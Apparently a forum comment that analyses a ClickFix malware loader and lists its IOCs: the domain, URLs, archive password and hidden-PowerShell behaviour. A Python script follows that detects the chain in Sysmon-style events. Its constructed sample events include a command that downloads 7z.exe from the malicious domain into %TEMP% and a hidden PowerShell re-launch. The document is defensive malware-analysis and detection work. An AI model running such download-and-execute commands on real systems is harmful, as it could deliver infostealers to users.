It's a multi-stage malware loader. The decoded PowerShell does this:
1. Forces TLS 1.2 and creates a randomly-named folder in %TEMP%.
2. Downloads a copy of 7z.exe (the legitimate 7-Zip binary) from hxxps://mstclaudens[.]beer/api/7z.exe — it brings its own archiver so it doesn't depend on one being installed.
3. Downloads a password-protected archive from hxxps://mstclaudens[.]beer/api/index.php?a=dl&dg=EP7IutuFPF8R1&... — the URL carries a campaign/victim tracking ID and a hash, so the operator knows which lure you came from. It retries up to 3 times.
4. Extracts the archive using 7-Zip with the hardcoded password rEEiT. The password is the whole point — it lets the payload sail past most network/email AV scanning, because scanners can't peek inside an encrypted zip.
5. Hunts the extracted contents for an .exe or .msi and runs it with a hidden window (-WindowStyle Hidden).
6. Deletes the downloaded files to clean up its tracks, and re-launches the whole thing in a hidden PowerShell process.
The actual malicious payload isn't in the script — it lives in that remote archive, which I can't and won't fetch. But the delivery pattern (fake CAPTCHA → "paste in terminal" → loader → encrypted second stage → silent execution) is the textbook ClickFix chain, and the end payload in these campaigns is almost always an infostealer (Lumma, StealC, Vidar, and friends) — something that grabs browser passwords, cookies, session tokens, and crypto wallets and ships them off. The Start-Process … -WindowStyle Hidden and self-cleanup are there so you'd never see it happen. IOCs worth recording / blocking:
Domain: mstclaudens[.]beer (note the cute "claudens" — these .beer / random-word TLDs are common for throwaway C2)
URLs: hxxps://mstclaudens[.]beer/api/7z.exe and hxxps://mstclaudens[.]beer/api/index.php?a=dl&...
Archive password: rEEiT
Behavior: PowerShell spawning a child PowerShell with -NoProfile -WindowStyle Hidden -Command, writing random .exe/.zip names to %TEMP%
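A detection sketch for the behaviors listed above, added here as an example and not part of the comment or of any tool it mentions. It runs four rules over process-creation records shaped like Sysmon Event ID 1 (image, parent image, command line) and flags each stage of the chain: the download referencing the loader domain, a dropped 7z.exe run from %TEMP% with a password switch, PowerShell launching an .exe/.msi from %TEMP%, and PowerShell re-launching itself hidden. The domain and archive password come from the comment (the domain is written live in the code so it matches log text); the field names, the sample events and the handling of PowerShell's abbreviated switches (-w, -nop) are assumptions.

```python
"""Behavioural rules for the ClickFix loader chain, run over constructed
process-creation events. Field names mimic Sysmon Event ID 1; everything in
SAMPLE_EVENTS is made up for illustration, not real telemetry."""
import re
from pathlib import PureWindowsPath

# IOCs from the comment above.
IOC_DOMAIN = "mstclaudens.beer"
IOC_ARCHIVE_PASSWORD = "rEEiT"

POWERSHELL = {"powershell.exe", "pwsh.exe"}
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
# -WindowStyle Hidden and -NoProfile, including the prefix abbreviations PowerShell accepts (assumption: -w / -nop).
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
NOPROFILE_RE = re.compile(r"-nop(?:rofile)?\b", re.IGNORECASE)
# 7-Zip's password switch is -p with the password attached (e.g. -prEEiT).
SEVENZIP_PW_RE = re.compile(r"(?:^|\s)-p(\S+)")


def basename(path):
    """Lower-cased file name of a Windows path; works on non-Windows hosts too."""
    return PureWindowsPath(path).name.lower()


def rule_hidden_child_powershell(ev):
    """PowerShell parent spawning a hidden, profile-less PowerShell child (the re-launch step)."""
    cmd = ev["command_line"]
    return (basename(ev["image"]) in POWERSHELL
            and basename(ev["parent_image"]) in POWERSHELL
            and HIDDEN_RE.search(cmd) is not None
            and NOPROFILE_RE.search(cmd) is not None)


def rule_ioc_domain(ev):
    """Any command line that references the loader's download domain."""
    return IOC_DOMAIN in ev["command_line"].lower()


def rule_sevenzip_from_temp(ev):
    """7z.exe executing out of %TEMP% with a password switch (dropped archiver extracting stage 2)."""
    if basename(ev["image"]) != "7z.exe" or not TEMP_RE.search(ev["image"]):
        return False
    return SEVENZIP_PW_RE.search(ev["command_line"]) is not None


def rule_temp_exe_from_powershell(ev):
    """PowerShell launching an .exe from %TEMP%, or msiexec on an .msi there (the extracted payload)."""
    if basename(ev["parent_image"]) not in POWERSHELL:
        return False
    img = basename(ev["image"])
    if img == "msiexec.exe":
        return re.search(r"\\Temp\\[^\s\"]+\.msi", ev["command_line"], re.IGNORECASE) is not None
    return img.endswith(".exe") and TEMP_RE.search(ev["image"]) is not None


RULES = {
    "hidden_child_powershell": rule_hidden_child_powershell,
    "ioc_domain": rule_ioc_domain,
    "sevenzip_from_temp": rule_sevenzip_from_temp,
    "temp_exe_from_powershell": rule_temp_exe_from_powershell,
}


def scan(events):
    """Return (pid, rule_name) for every event/rule pair that fires, in event order."""
    return [(ev["pid"], name) for ev in events for name, rule in RULES.items() if rule(ev)]


def uses_known_password(events):
    """True if any 7z.exe command line carries the archive password from the comment."""
    for ev in events:
        m = SEVENZIP_PW_RE.search(ev["command_line"])
        if m and basename(ev["image"]) == "7z.exe" and m.group(1) == IOC_ARCHIVE_PASSWORD:
            return True
    return False


# Constructed sample: two benign events, then the loader chain.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TMP = r"C:\Users\victim\AppData\Local\Temp\k3f9xq2"
SAMPLE_EVENTS = [
    {"pid": 1001, "image": r"C:\Windows\explorer.exe", "parent_image": r"C:\Windows\System32\userinit.exe",
     "command_line": "explorer.exe"},
    {"pid": 1002, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell.exe -Command "Get-ChildItem C:\\Users"'},
    {"pid": 2001, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": f'powershell.exe -Command "iwr https://{IOC_DOMAIN}/api/7z.exe -OutFile {TMP}\\7z.exe"'},
    {"pid": 2002, "image": TMP + r"\7z.exe", "parent_image": PS,
     "command_line": f'"{TMP}\\7z.exe" x -y -p{IOC_ARCHIVE_PASSWORD} -o"{TMP}" "{TMP}\\q8r1.zip"'},
    {"pid": 2003, "image": TMP + r"\setup_4f2a.exe", "parent_image": PS,
     "command_line": f'"{TMP}\\setup_4f2a.exe"'},
    {"pid": 2004, "image": PS, "parent_image": PS,
     "command_line": 'powershell.exe -NoProfile -WindowStyle Hidden -Command "<re-launch of the same script>"'},
]

if __name__ == "__main__":
    for pid, rule in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
    print("known archive password seen:", uses_known_password(SAMPLE_EVENTS))
```

The password rule fires on any 7z.exe under %TEMP% given a -p switch, not only on rEEiT, since the password is trivially rotated between campaigns; the domain match is the brittle one and is the first thing to expect to change.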
tronium•28m ago